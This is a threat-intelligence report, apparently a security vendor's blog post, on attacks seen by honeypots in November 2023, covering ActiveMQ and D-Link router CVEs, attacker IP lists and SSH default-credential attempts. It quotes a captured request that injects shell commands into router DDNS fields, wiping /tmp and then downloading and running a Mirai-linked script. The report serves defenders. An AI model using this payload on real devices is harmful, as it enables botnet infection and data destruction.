Our selection of alerts on honeypots: report 21 – November 2023

The following report consists of TEHTRIS observations on our worldwide honeypots network to provide you with information on what is going on the Internet. This actionable cyber threat intelligence is based on observations from a real and uncontrolled environment. Keeping track of trends and keeping an eye on what is actively scanned by threat actors in a reconnaissance phase allows to adequately adjust the cybersecurity posture.

Check out our previous report here.

Follow-up of CVE-2023-46604 exploit attempts

Since our last report, we monitored a global increase in exploit attempts of targeting port 61616/TCP, which is ActiveMQ’s default port.

The CVE-2023-46604 (CVSSv3: 9.8), which refers to a remote code execution in Apache ActiveMQ, was disclosed on October 24^th. It is now mentioned in CISA’s known exploited vulnerabilities catalog since the 2^nd of November.

On our worldwide honeypot network, we monitored a major increase in targeting this specific port since a proof of concept (PoC) was publicly disclosed on Github on 27^th of October. The famous IT and cyber media Bleeping Computer also published an article on the 1^st of November helping spreading the information accross the globe.

More than 700 unique IP addresses targeted this port these past two weeks. They are mostly hosted in the US (77%), in China (8%), in Bulgaria (4%), in Russia (3%) and in Canada (2%). Compared to last month, European honeypots (18%) are now the main victim of this threat instead of Singapore (respectively amouting for 18% and 14% of all hits, compared to 12% and 17% previously). They are followed by honeypots hosted in Indonesia (14%), in the UAE (8%) and in Hong-Kong (5%).

This phenomenon illustrates how the publication of a vulnerability can shape what is seen in the cyberspace in just a few days all around the world.

Updated top 10 IoCs – all flaged as malicious by VirusTotal community:

🇺🇸 US IP addresses hosted by AS 63949 (Akamai Connected Cloud)

• 198.74.50[.]114
• 45.33.78[.]70
• 139.144.235[.]132
• 143.42.1[.]53
• 139.144.239[.]78
• 170.187.165[.]139 – already in the top 10 in October

🇺🇸 US IP addresses hosted by AS 399045 (DEDIOUTLET-NETWORKS)

• 68.69.186[.]14

🇨🇳 Chinese IP address hosted by AS 58461 (CT-HangZhou-IDC)

• 183.136.225[.]9 – already in the top 10 in October

🇧🇬 BG IP address hosted by AS 394711 (LIMENET)

• 91.92.248[.]140

🇷🇺 RU IP address hosted by AS 12389 (Rostelecom)

• 81.177.125[.]9

CVE-2021-45382 in D-Link routers exploit attempts

The CVE-2021-45382 (CVSSv3: 9.8) refers to a remote command execution existance in D-Link routers via the DDNS function in ncc2 binary file. The explanations provided in this GitHub clearly illustrate the lack of control over the entries made by users on the ddnshostname and ddnusername variables.

On the 10^th of November, the IP address 120.63.180[.]123 (hosted in India by AS 17813 Mahanagar Telephone Nigam Limited) targeted one of our European honeypot hosted in Italia on port TCP/80.

This IP address is flagged by VirusTotal community for being malicious.

Our honeypot captured the following packet which point out the parameters mentioned above:

POST /ddns_check.ccp HTTP/1.1

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest

Content-Length: 300 Cookie: hasLogin=1

Connection: close ccp_act=doCheck&ddnsHostName=;cd${IFS}/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://194.180.48[.]100/l.sh;${IFS}sh${IFS}l.sh;&ddnsUsername=;cd${IFS}/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://194.180.48[.]100/l.sh;${IFS}sh${IFS}l.sh;&ddnsPassword=123123123

The C2 address mentioned in bold inside the request is known by VirusTotal community for performing malicious activities related to Mirai botnet. The last part of the packet is a wget request for downloading the file 1.sh.

This CVE is mentioned in the CISA’s known exploited vulnerabilities catalog since April 2022 for being exploited in the wild. The impacted routers have reached End of Life (“EOL”) and as such, this issue will not be patched. TEHTRIS recommend to upgrade impacted hardware as soon as possible.

Focus on SSH connection attempts with admin/1q2w3e

Almost 40 unique IP addresses attempted to connect on SSH services included on our honeypots using the following credentials:

These credentials turn out to be the default credentials to ABP framework which offers an architecture to build enterprise software solutions.

Geographical repartition of victim honeypots

Top 10 IoCs – all known from VirusTotal community:

ASIA

🇨🇳 China

• 183.237.47[.]139
• 49.234.53[.]247
• 43.138.29[.]247
• 43.138.223[.]128

🇰🇷 Korea

• 61.80.237[.]204

🇸🇬 Singapore

• 43.156.237[.]23

EUROPE

🇵🇹 Portugal

• 85.240.175[.]100

🇫🇷 France

• 46.105.158[.]45

AMERICAS

🇺🇸 United-States

• 72.240.125[.]133

🇵🇪 Peru

• 45.71.33[.]220

Multiple exploit attempts by an Indian threat actor

Focus on two CVE of 2018 still actively exploited

---